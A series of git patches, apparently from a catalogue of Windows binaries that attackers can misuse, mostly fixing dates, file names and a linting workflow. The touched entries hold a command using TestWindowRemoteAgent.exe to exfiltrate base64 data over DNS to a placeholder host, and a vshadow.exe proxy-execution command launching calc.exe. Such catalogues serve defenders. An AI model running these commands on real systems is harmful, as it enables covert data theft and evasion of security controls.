From 03711770b7a4fa63596c0bbf8a0f502ca0653891 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 16:58:52 +0100 Subject: [PATCH 01/10] Enforcing YYYY-MM-DD format for dates --- YML-Schema.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/YML-Schema.yml b/YML-Schema.yml index dc3f775..250392f 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -26,6 +26,7 @@ mapping: required: true "Created": type: date + format: '%Y-%M-%d' required: true "Commands": type: seq From be18d9b26da86a822be211e89c3c46a9f6b21d3a Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:10:21 +0100 Subject: [PATCH 02/10] Add file extension validation --- .github/workflows/yaml-linting.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 120daa8..5c49ebb 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -7,6 +7,8 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Check file extensions + run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use ".yml" (all lower case) for files in the yml/ folder."; exit 1; fi - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: From 52adf7084d0816b36ae1b163ee62d9ce4e2e5147 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:12:12 +0100 Subject: [PATCH 03/10] Fixing incorrect extension of testwindowremoteagent entry --- .github/workflows/yaml-linting.yml | 2 +- .../{testwindowremoteagent.yaml => testwindowremoteagent.yml} | 0 2 files changed, 1 insertion(+), 1 deletion(-) rename yml/OtherMSBinaries/{testwindowremoteagent.yaml => testwindowremoteagent.yml} (100%) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5c49ebb..7c6026e 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -8,7 +8,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Check file extensions - run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use ".yml" (all lower case) for files in the yml/ folder."; exit 1; fi + run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yaml b/yml/OtherMSBinaries/testwindowremoteagent.yml similarity index 100% rename from yml/OtherMSBinaries/testwindowremoteagent.yaml rename to yml/OtherMSBinaries/testwindowremoteagent.yml From 3ec9655b61436da5f48c464a1b2388726c15985f Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:16:05 +0100 Subject: [PATCH 04/10] Updating search path --- .github/workflows/yaml-linting.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 7c6026e..f01a963 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -8,7 +8,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Check file extensions - run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi + run: if [[ $(find "${GITHUB.WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: From 96aad19b8813cf0a4dd348f96c0e9f3a71442e39 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:19:52 +0100 Subject: [PATCH 05/10] Fixing trailing spaces --- yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml index 8e5cda3..fafdef4 100644 --- a/yml/OtherMSBinaries/testwindowremoteagent.yml +++ b/yml/OtherMSBinaries/testwindowremoteagent.yml @@ -2,7 +2,7 @@ Name: TestWindowRemoteAgent.exe Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC Author: Onat Uzunyayla -Created: 2023-21-08 +Created: 2023-21-08 Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS From 93aeeacb4788dbb7152833bba1cf90abbacfd504 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:21:42 +0100 Subject: [PATCH 06/10] Ensuring GitHub Actions isn't run twice on PR --- .github/workflows/yaml-linting.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index f01a963..f7247f4 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -4,6 +4,7 @@ on: [push,pull_request] jobs: lintFiles: + if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From 135fc5ba49770e4d0d262ce6b7594d5e8b69a723 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:22:22 +0100 Subject: [PATCH 07/10] Fixing incorrect date on testwindowremoteagent entry --- yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml index fafdef4..c6bd128 100644 --- a/yml/OtherMSBinaries/testwindowremoteagent.yml +++ b/yml/OtherMSBinaries/testwindowremoteagent.yml @@ -2,7 +2,7 @@ Name: TestWindowRemoteAgent.exe Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC Author: Onat Uzunyayla -Created: 2023-21-08 +Created: 2023-08-21 Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS From e90d795e6278a94e49e1fb09a48299f58375d15f Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:24:36 +0100 Subject: [PATCH 08/10] Fixing incorrect category on testwindowremoteagent entry --- yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml index c6bd128..ef3f6d2 100644 --- a/yml/OtherMSBinaries/testwindowremoteagent.yml +++ b/yml/OtherMSBinaries/testwindowremoteagent.yml @@ -7,7 +7,7 @@ Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS Usecase: Attackers may utilize this to exfiltrate data over DNS - Category: Data Exfiltration + Category: Upload Privileges: User MitreID: T1048 OperatingSystem: Windows 10, Windows 11 From 366cdbd57cff249584c20976eb52fbb585ce0556 Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:38:30 +0100 Subject: [PATCH 09/10] Renaming vshadow file --- .../{testwindowremoteagent.yml => Testwindowremoteagent.yml} | 0 yml/OtherMSBinaries/{vshadow.yaml => Vshadow.yml} | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename yml/OtherMSBinaries/{testwindowremoteagent.yml => Testwindowremoteagent.yml} (100%) rename yml/OtherMSBinaries/{vshadow.yaml => Vshadow.yml} (100%) diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/Testwindowremoteagent.yml similarity index 100% rename from yml/OtherMSBinaries/testwindowremoteagent.yml rename to yml/OtherMSBinaries/Testwindowremoteagent.yml diff --git a/yml/OtherMSBinaries/vshadow.yaml b/yml/OtherMSBinaries/Vshadow.yml similarity index 100% rename from yml/OtherMSBinaries/vshadow.yaml rename to yml/OtherMSBinaries/Vshadow.yml From b3951952b0754306c6415db8d843b172c5f1adbe Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:41:18 +0100 Subject: [PATCH 10/10] Fixing command attribute on Vshadow --- yml/OtherMSBinaries/Vshadow.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 25e53e7..0412f78 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml @@ -1,10 +1,10 @@ --- -Name: vshadow.exe +Name: Vshadow.exe Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies. Author: Ayberk HalaƧ Created: 2023-09-06 Commands: - - Command: vshadow.exe -nw -exec=c:\windows\system32\calc.exe C: + - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:' Description: Executes calc.exe from vshadow.exe. Usecase: Performs execution of specified executable file. Category: Execute